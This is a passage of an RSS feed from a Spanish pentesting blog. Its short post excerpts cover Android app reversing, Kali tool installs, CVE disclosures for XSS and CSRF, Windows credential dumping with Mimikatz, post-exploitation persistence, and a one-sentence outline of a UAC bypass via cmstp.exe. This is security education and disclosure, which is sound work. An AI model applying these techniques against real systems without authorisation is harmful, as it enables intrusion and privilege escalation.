. Esta herramienta es de gran utilidad para el análisis de aplicaciones Android (y otro tipo de aplicaciones), ya que nos permitirá &lt;strong&gt;obtener los datos&lt;/strong&gt; de las distintas clases de la aplicación y exportarlos a formato SQLite. También permite realizar una serie de &lt;strong&gt;operaciones de búsqueda&lt;/strong&gt; sobre dichos datos atendiendo a los siguientes criterios:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Clases&lt;/li&gt;
&lt;li&gt;Propiedades&lt;/li&gt;
&lt;li&gt;Métodos&lt;/li&gt;
&lt;li&gt;Cadenas&lt;/li&gt;
&lt;li&gt;Llamadas (tanto origen como destino de una llamada)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Finalmente, se pueden &lt;strong&gt;generar distintos diagramas&lt;/strong&gt; en los que se puede ver la relación entre clases.&lt;/p&gt;</description></item><item><title>Que es Smali y como parchear una aplicación Android</title><link>https://hackpuntes.com/es/posts/que-es-smali-y-como-parchear-una-aplicacion-android/</link><pubDate>Mon, 13 May 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/que-es-smali-y-como-parchear-una-aplicacion-android/</guid><description>&lt;h2 id="qué-es-smali"&gt;¿Qué es Smali?&lt;/h2&gt;
&lt;p&gt;Las aplicaciones Android contienen ficheros .dex (Dalvik EXecutable). Estos ficheros se pueden decompilar para obtener un código de bajo nivel llamado Dalvik Bytecode. Utilizando &lt;a href="https://github.com/JesusFreke/smali" target="_blank" rel="noopener noreferrer"&gt;smali/baksmali&lt;/a&gt;
 (ensamblador/desensamblador) se puede obtener una representación en un lenguaje de bajo nivel con el que se puede trabajar más fácilmente, al cual llamaremos código Smali. Hoy en día, apktool ya incorpora smali/baksmali, por lo que será suficiente con desempaquetar el fichero .apk con apktool para obtener el código Smali.&lt;/p&gt;</description></item><item><title>Instalación de Docker en Kali Linux</title><link>https://hackpuntes.com/es/posts/instalacion-de-docker-en-kali-linux/</link><pubDate>Wed, 08 May 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/instalacion-de-docker-en-kali-linux/</guid><description>&lt;p&gt;En esta entrada veremos como instalar &lt;a href="https://www.docker.com/" target="_blank" rel="noopener noreferrer"&gt;Docker Community Edition&lt;/a&gt;
 en nuestra máquina Kali Linux 2019.&lt;/p&gt;
&lt;h2 id="1-añadir-la-clave-pgp-de-docker"&gt;1. Añadir la clave PGP de Docker&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;curl -fsSL https://download.docker.com/linux/debian/gpg &lt;span class="p"&gt;|&lt;/span&gt; sudo apt-key add -
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="2-configurar-el-repositorio-de-docker"&gt;2. Configurar el repositorio de Docker&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;deb https://download.docker.com/linux/debian stretch stable&amp;#39;&lt;/span&gt; &amp;gt; /etc/apt/sources.list.d/docker.list
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="3-actualizar"&gt;3. Actualizar&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;apt-get update
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="4-eliminar-versiones-obsoletas-de-docker-en-caso-que-las-tuviéramos"&gt;4. Eliminar versiones obsoletas de Docker (en caso que las tuviéramos)&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;apt-get remove docker docker-engine docker.io
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="5-instalar-docker"&gt;5. Instalar Docker&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;apt-get install docker-ce
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="6-comprobar-si-docker-se-instaló-correctamente"&gt;6. Comprobar si Docker se instaló correctamente&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;docker run hello-world
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="7-comprobar-la-versión-de-docker-instalada"&gt;7. Comprobar la versión de Docker instalada&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;docker version
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="extras"&gt;Extras&lt;/h2&gt;
&lt;h3 id="añadir-usuario-al-grupo-de-docker"&gt;Añadir usuario al grupo de docker&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;usermod -aG docker &lt;span class="nv"&gt;$USER&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="arrancar-docker"&gt;Arrancar Docker&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;systemctl start docker
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="arrancar-docker-al-inicio"&gt;Arrancar Docker al inicio&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;systemctl &lt;span class="nb"&gt;enable&lt;/span&gt; docker
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="instalar-dockstation-gestor-de-dockers"&gt;Instalar DockStation (Gestor de dockers)&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;wget https://github.com/DockStation/dockstation/releases/download/v1.5.1/dockstation_1.5.1_amd64.deb
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;dpkg -i dockstation_1.5.1_amd64.deb
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;a href="https://hackpuntes.com/images/instalacion-de-docker-en-kali-linux/instalacion-de-docker-en-kali-linux_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/instalacion-de-docker-en-kali-linux/instalacion-de-docker-en-kali-linux_001.webp" alt="Instalación de Docker en Kali Linux" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Listado de comandos ADB más utilizados</title><link>https://hackpuntes.com/es/posts/listado-de-comandos-adb-mas-utilizados/</link><pubDate>Mon, 06 May 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/listado-de-comandos-adb-mas-utilizados/</guid><description>&lt;p&gt;Android Debug Bridge (ADB) es una &lt;strong&gt;herramienta de línea de comandos&lt;/strong&gt; que viene incluida con el SDK de Android, permite a los desarrolladores &lt;strong&gt;comunicarse con un emulador o un dispositivo Android&lt;/strong&gt; conectado directamente desde la línea de comandos. Esta herramienta podemos encontrarla en el directorio &lt;code&gt;[SDK-PATH]/platform-tools&lt;/code&gt;, en Windows por defecto será en &lt;code&gt;C:\Users\[USUARIO]\AppData\Local\Android\Sdk\platform-tools&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;En esta entrada, vamos a repasar los &lt;strong&gt;comandos más utilizados de ADB&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id="listado-de-dispositivos"&gt;Listado de dispositivos&lt;/h2&gt;
&lt;p&gt;Lo primero que debemos hacer, enumerar los dispositivos conectados.&lt;/p&gt;</description></item><item><title>Persistencia en sistemas Linux a través de XScreenSaver</title><link>https://hackpuntes.com/es/posts/persistencia-en-sistemas-linux-a-traves-de-xscreensaver/</link><pubDate>Mon, 22 Apr 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/persistencia-en-sistemas-linux-a-traves-de-xscreensaver/</guid><description>&lt;p&gt;Después de la explotación con éxito de un sistema, debemos de &lt;strong&gt;obtener persistencia&lt;/strong&gt; en el mismo, este es uno de los pasos más importantes de las fases del pentesting y que, generalmente, ocasiona más inconvenientes, ya que, &lt;strong&gt;podemos perder el acceso al sistema&lt;/strong&gt; si este se reinicia, existen problemas de red o se edita el archivo utilizado como puerta trasera (backdoor).&lt;/p&gt;
&lt;p&gt;Esta manera de obtener persistencia, la descubrí leyendo write-ups de CTFs, en concreto, de uno realizado por &lt;a href="https://twitter.com/iamrastating" target="_blank" rel="noopener noreferrer"&gt;iamrastating&lt;/a&gt;
.&lt;/p&gt;</description></item><item><title>Guía sobre toma de control de subdominios</title><link>https://hackpuntes.com/es/posts/guia-sobre-toma-de-control-de-subdominios/</link><pubDate>Thu, 11 Apr 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/guia-sobre-toma-de-control-de-subdominios/</guid><description>&lt;p&gt;En esta publicación, voy a hablaros sobre una vulnerabilidad conocida como &lt;strong&gt;Toma de control de subdominios&lt;/strong&gt; (subdomain takeover), explicaré en qué consiste y como podemos detectarla. Es posible que pueda ir &lt;strong&gt;actualizando esta entrada&lt;/strong&gt; con nuevas herramientas o técnicas de descubrimiento, así que, te sugiero que la guardes en tus favoritos. 😉&lt;/p&gt;
&lt;h2 id="en-qué-consiste-la-vulnerabilidad"&gt;¿En qué consiste la vulnerabilidad?&lt;/h2&gt;
&lt;p&gt;La vulnerabilidad de toma de control de subdominio, ocurre cuando un &lt;strong&gt;registro DNS&lt;/strong&gt; (principalmente CNAME) habilita la delegación de zona &lt;strong&gt;a un servicio de terceros&lt;/strong&gt; (Amazon S3, Azure, GitHub, Heroku, etc) y, pasado un tiempo, este servicio &lt;strong&gt;puede dejar de ser utilizado o borrado y reclamado por un usuario malintencionado&lt;/strong&gt;, un ejemplo de un caso real sería el siguiente:&lt;/p&gt;</description></item><item><title>Instalación de Golang y Goca en Kali Linux</title><link>https://hackpuntes.com/es/posts/instalacion-de-golang-y-goca-en-kali-linux/</link><pubDate>Sun, 31 Mar 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/instalacion-de-golang-y-goca-en-kali-linux/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/instalacion-de-golang-y-goca-en-kali-linux/instalacion-de-golang-y-goca-en-kali-linux_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/instalacion-de-golang-y-goca-en-kali-linux/instalacion-de-golang-y-goca-en-kali-linux_banner.webp" alt="Instalación de Golang y Goca en Kali Linux" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Golang, es un lenguaje de programación moderno desarrollado por Google, inspirado en la sintaxis de C, es multiplataforma y orientado a objetos. Muchos de los proyectos Open Source, están pasando a este lenguaje, un ejemplo es &lt;a href="https://github.com/michenriksen/aquatone" target="_blank" rel="noopener noreferrer"&gt;Aquatone&lt;/a&gt;
 o &lt;a href="https://github.com/gocaio/goca" target="_blank" rel="noopener noreferrer"&gt;Goca&lt;/a&gt;
, además, &lt;a href="https://github.com/dreddsa5dies/goHackTools" target="_blank" rel="noopener noreferrer"&gt;existen repositorios&lt;/a&gt;
 interesantes con variedad de herramientas de hacking desarrolladas en este lenguaje, por lo tanto, es recomendado tenerlo en nuestra máquina por si necesitáramos usarlo.&lt;/p&gt;</description></item><item><title>CVE-2019-7400 Rukovoditel ERP &amp; CRM 2.4.1 - Cross-Site Scripting Reflejado</title><link>https://hackpuntes.com/es/posts/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/</link><pubDate>Sun, 24 Mar 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/</guid><description>&lt;h2 id="cve-2019-7400"&gt;CVE-2019-7400&lt;/h2&gt;
&lt;h3 id="rukovoditel-erp--crm-241--cross-site-scripting-reflejado"&gt;Rukovoditel ERP &amp;amp; CRM 2.4.1 – Cross-Site Scripting Reflejado&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado_001.webp" alt="CVE-2019-7400 Rukovoditel ERP &amp;amp; CRM 2.4.1 - Cross-Site Scripting Reflejado" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Rukovoditel es una aplicación gratuita de &lt;strong&gt;gestión de proyectos de código abierto&lt;/strong&gt; basada en web. Muy lejos de las aplicaciones tradicionales, Rukovoditel ofrece a los usuarios un enfoque más amplio y extenso de la gestión de proyectos. Sus opciones de personalización permiten a los usuarios crear entidades adicionales, modificar y especificar la relación entre ellas y generar los informes necesarios. La plataforma permite a los usuarios crear su propia aplicación que está específicamente diseñada para su actividad (CRM, ERP, HRM, WMS, etc.)&lt;/p&gt;</description></item><item><title>Configurando Burp Suite para versiones superiores a Android Nougat</title><link>https://hackpuntes.com/es/posts/configurando-burp-suite-para-versiones-superiores-a-android-nougat/</link><pubDate>Sun, 24 Feb 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/configurando-burp-suite-para-versiones-superiores-a-android-nougat/</guid><description>&lt;p&gt;En las últimas semanas, estoy auditando varias aplicaciones de Android con Burp Suite, después de unos días de trabajo con mi vieja versión de Android 5.0 pensé que ya era hora de actualizar a una superior, y quizás, utilizar nuevas herramientas, aquí me tope con &lt;a href="https://www.genymotion.com/" target="_blank" rel="noopener noreferrer"&gt;Genymotion&lt;/a&gt;
 gracias a un compañero de trabajo.&lt;/p&gt;
&lt;p&gt;Una vez instalado y configurado Burp Suite con Android tal y como nos recomiendan en la web de &lt;a href="https://support.portswigger.net/customer/portal/articles/1841102-installing-burp-s-ca-certificate-in-an-android-device" target="_blank" rel="noopener noreferrer"&gt;Portswigger&lt;/a&gt;
, me encontré con el siguiente problema:&lt;/p&gt;</description></item><item><title>Suplantación de cuentas de Gmail con 2FA</title><link>https://hackpuntes.com/es/posts/suplantacion-de-cuentas-de-gmail-con-2fa/</link><pubDate>Tue, 22 Jan 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/suplantacion-de-cuentas-de-gmail-con-2fa/</guid><description>&lt;p&gt;En este caso, vamos a aprender como los atacantes consiguen obtener acceso a cuentas protegidas mediante el doble factor de autenticación en &lt;strong&gt;Gmail&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;El doble factor de autenticación (&lt;strong&gt;2FA&lt;/strong&gt;) es una medida de seguridad empleada por los sistemas de autenticación que proporciona una capa de seguridad adicional al sistema. Consiste en que el usuario que quiere autenticarse presente al menos dos pruebas que demuestren que es quien dice ser.&lt;/p&gt;
&lt;p&gt;En la mayoría de los casos basados en este esquema se suele usar como factores de autenticación:&lt;/p&gt;</description></item><item><title>Análisis estático de código fuente con SonarQube</title><link>https://hackpuntes.com/es/posts/analisis-estatico-de-codigo-fuente-con-sonarqube/</link><pubDate>Mon, 21 Jan 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/analisis-estatico-de-codigo-fuente-con-sonarqube/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/analisis-estatico-de-codigo-fuente-con-sonarqube/analisis-estatico-de-codigo-fuente-con-sonarqube_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/analisis-estatico-de-codigo-fuente-con-sonarqube/analisis-estatico-de-codigo-fuente-con-sonarqube_banner.webp" alt="Análisis estático de código fuente con SonarQube" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SonarQube es un conjunto de herramientas de código abierto con interfaz web que nos ayudará a realizar &lt;strong&gt;análisis estáticos&lt;/strong&gt; a nuestro código fuente con el objetivo de mejorar la calidad, solucionar errores y buscar vulnerabilidades.&lt;/p&gt;
&lt;p&gt;Actualmente, la &lt;a href="https://www.sonarqube.org/sonarqube-7-5/" target="_blank" rel="noopener noreferrer"&gt;última versión es la 7.5&lt;/a&gt;
, y soporta más de 25 lenguajes de programación.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/analisis-estatico-de-codigo-fuente-con-sonarqube/analisis-estatico-de-codigo-fuente-con-sonarqube_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/analisis-estatico-de-codigo-fuente-con-sonarqube/analisis-estatico-de-codigo-fuente-con-sonarqube_001.webp" alt="Análisis estático de código fuente con SonarQube" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="1-instalación"&gt;🖥 1. Instalación&lt;/h2&gt;
&lt;p&gt;1.1 Descargar &lt;a href="https://www.sonarqube.org/downloads/" target="_blank" rel="noopener noreferrer"&gt;SonarQube Community Edition 7.5&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-19829 Integria IMS 5.0.83 - Cross-Site Request Forgery</title><link>https://hackpuntes.com/es/posts/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/</link><pubDate>Mon, 17 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/</guid><description>&lt;p&gt;Las vulnerabilidades &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%5c%28CSRF%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Request Forgery (CSRF)&lt;/a&gt;
 encontradas en el software &lt;a href="https://sourceforge.net/projects/integria/files/5.0.83/" target="_blank" rel="noopener noreferrer"&gt;Integria IMS 5.0.83&lt;/a&gt;
 han quedado solucionadas. Estas, &lt;strong&gt;permitían a un usuario malintencionado borrar usuarios de la aplicación&lt;/strong&gt; a través de este ataque. La vulnerabilidad, ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-19829" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-19829&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="cve-2018-19829"&gt;CVE-2018-19829&lt;/h2&gt;
&lt;h3 id="integria-ims-5083---cross-site-request-forgery-csrf"&gt;Integria IMS 5.0.83 - Cross-Site Request Forgery (CSRF)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery_001.webp" alt="CVE-2018-19829 Integria IMS 5.0.83 - Cross-Site Request Forgery" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Integria IMS es un &lt;strong&gt;software de help desk&lt;/strong&gt; sencillo, potente y fácil de usar. Dispone de inventario automatizado y controlado desde un solo interfaz. Agiliza los procesos reduciendo los tiempos y costes de gestión en sus proyectos. Gracias a sus informes personalizados estará informado y podrá ver fácilmente la gestión y calidad del servicio dado en tiempo real.&lt;/p&gt;</description></item><item><title>CVE-2018-19828 Integria IMS 5.0.83 - Cross-Site Scripting Reflejado</title><link>https://hackpuntes.com/es/posts/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/</link><pubDate>Fri, 14 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/</guid><description>&lt;h2 id="cve-2018-19828"&gt;CVE-2018-19828&lt;/h2&gt;
&lt;h3 id="integria-ims-5083---cross-site-scripting-reflejado"&gt;Integria IMS 5.0.83 - Cross-Site Scripting Reflejado&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado_001.webp" alt="CVE-2018-19828 Integria IMS 5.0.83 - Cross-Site Scripting Reflejado" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Integria IMS es un &lt;strong&gt;software de help desk&lt;/strong&gt; sencillo, potente y fácil de usar. Dispone de inventario automatizado y controlado desde un solo interfaz. Agiliza los procesos reduciendo los tiempos y costes de gestión en sus proyectos. Gracias a sus informes personalizados estará informado y podrá ver fácilmente la gestión y calidad del servicio dado en tiempo real.&lt;/p&gt;</description></item><item><title>Obtención de contraseña de usuario en Windows 10 décimo aniversario</title><link>https://hackpuntes.com/es/posts/obtencion-de-contrasena-de-usuario-en-windows-10-decimo-aniversario/</link><pubDate>Fri, 14 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/obtencion-de-contrasena-de-usuario-en-windows-10-decimo-aniversario/</guid><description>&lt;p&gt;En esta entrada aprenderemos a recuperar la contraseña de un usuario en un Windows 10 con la actualización del décimo aniversario.&lt;/p&gt;
&lt;p&gt;En primer lugar, vamos a definir los ficheros y herramientas que vamos a emplear para llevar a cabo este ejercicio:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;SAM:&lt;/strong&gt; son las siglas de Security Account Manager, este fichero se encarga de almacenar credenciales de los usuarios del sistema en Windows. Dentro de la SAM las contraseñas se almacenan en formato hash.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SYSKEY:&lt;/strong&gt; este fichero se creó, a partir de Windows 2000, para proteger la SAM frente a ataques offline. Si se habilita el uso de este fichero, las hashes almacenadas en la SAM se cifrarán con una clave conocida como syskey.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mimikatz:&lt;/strong&gt; es una herramienta desarrollada en C para realizar diferentes pruebas de seguridad en sistemas Windows. Se suele usar habitualmente para obtener contraseñas y hashes de contraseñas, aunque también permite realizar ataques de tipo Pass-The-Hash.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pwdump:&lt;/strong&gt; esta herramienta nos permite volcar el contenido de la SAM.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hashcat:&lt;/strong&gt; poderosa herramienta para la recuperación de contraseñas. Nos permite diferentes tipos de ataques sobre las contraseñas y admite multitud de tipos de hash.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;El escenario que tenemos el siguiente, un usuario ha olvidado la contraseña de acceso de su portátil, en el cual tiene Windows 10 como sistema operativo.&lt;/p&gt;</description></item><item><title>CVE-2018-18921 PHP Server Monitor 3.3.1 - Cross-Site Request Forgery</title><link>https://hackpuntes.com/es/posts/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/</link><pubDate>Mon, 03 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/</guid><description>&lt;p&gt;Las vulnerabilidades &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%5c%28CSRF%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Request Forgery (CSRF)&lt;/a&gt;
 encontradas en el software &lt;a href="https://github.com/phpservermon/phpservermon/releases/tag/v3.3.1" target="_blank" rel="noopener noreferrer"&gt;PHP Server Monitor 3.3.1&lt;/a&gt;
 han quedado solucionadas. Estas, &lt;strong&gt;permitían a un usuario malintencionado borrar servidores, logs y usuarios de la aplicación&lt;/strong&gt; a través de este ataque. La vulnerabilidad, ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18921" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18921&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="cve-2018-18921"&gt;CVE-2018-18921&lt;/h2&gt;
&lt;h3 id="php-server-monitor-331---cross-site-request-forgery-csrf"&gt;PHP Server Monitor 3.3.1 - Cross-Site Request Forgery (CSRF)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery_001.webp" alt="CVE-2018-18921 PHP Server Monitor 3.3.1 - Cross-Site Request Forgery" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;PHP Server Monitor es una &lt;strong&gt;aplicación web orientada a monitorizar la disponibilidad de servidores PHP&lt;/strong&gt;, comprueba si están correctamente funcionando, monitoriza los servicios, genera gráficos e historial de actividad además de almacenar logs de errores y permitir notificaciones a través de email y Telegram, está desarrollada en PHP y MySQL.&lt;/p&gt;</description></item><item><title>365 retos de Ciberseguridad junto a SIDERTIA</title><link>https://hackpuntes.com/es/posts/365-retos-de-ciberseguridad-junto-a-sidertia/</link><pubDate>Thu, 29 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/365-retos-de-ciberseguridad-junto-a-sidertia/</guid><description>&lt;p&gt;Normalmente, suelo escribir entradas técnicas relacionadas con la Ciberseguridad, pero hoy, me vais a permitir hacer un paréntesis en las entradas del blog para hablaros sobre &lt;strong&gt;mi primer año dedicándome profesionalmente a la Ciberseguridad&lt;/strong&gt;, ya que hoy, 29 de noviembre de 2018, se cumple exactamente un año que empecé este reto junto a &lt;a href="https://www.sidertia.com/Home" target="_blank" rel="noopener noreferrer"&gt;SIDERTIA&lt;/a&gt;
, empresa dedicada a la Ciberseguridad con sede en Madrid. Por este motivo, quería compartir con todos vosotros un &lt;strong&gt;pequeño resumen de lo que ha sido este maravilloso año&lt;/strong&gt;, de mi experiencia laboral en este campo y de cómo decidí dedicarme a la Ciberseguridad.&lt;/p&gt;</description></item><item><title>Mocking the UAC - Bypasseando las nuevas versiones en Windows</title><link>https://hackpuntes.com/es/posts/mocking-the-uac-bypasseando-las-nuevas-versiones-en-windows/</link><pubDate>Fri, 23 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/mocking-the-uac-bypasseando-las-nuevas-versiones-en-windows/</guid><description>&lt;p&gt;Hace unos días, una nueva técnica llamada &lt;strong&gt;mocking&lt;/strong&gt; vio la luz en el amplio abanico de métodos para bypassear el UAC (&lt;strong&gt;User Account Control&lt;/strong&gt;) en las versiones más recientes de Windows, incluido Windows 10. Como es sabido, el UAC nos da una capa de seguridad ante posibles ataques de malware, evitando que se generen cambios en el registro, se creen ficheros, servicios, etc.&lt;/p&gt;
&lt;p&gt;Siguiendo el trabajo de @zc00l y @Oddvar, compilando mediante la consola de powershell un pequeño script en C# que explota el servicio &lt;code&gt;cmstp.exe&lt;/code&gt;, generamos una DLL que mediante &lt;strong&gt;Reflection.Assembly&lt;/strong&gt; cargamos en el sistema, para luego ejecutarla.&lt;/p&gt;</description></item><item><title>TOP 10 herramientas de seguridad para aplicaciones web</title><link>https://hackpuntes.com/es/posts/top-10-herramientas-de-seguridad-para-aplicaciones-web/</link><pubDate>Tue, 20 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/top-10-herramientas-de-seguridad-para-aplicaciones-web/</guid><description>&lt;p&gt;En esta entrada, os mostraré un listado de las que son (para mí), &lt;strong&gt;las 10 mejores herramientas de seguridad para aplicaciones web.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;No soy un experto en hacking web y puede que no estés del todo de acuerdo con mi lista TOP, por lo tanto, siéntete libre de comentar y añadir la tuya 😉&lt;/p&gt;
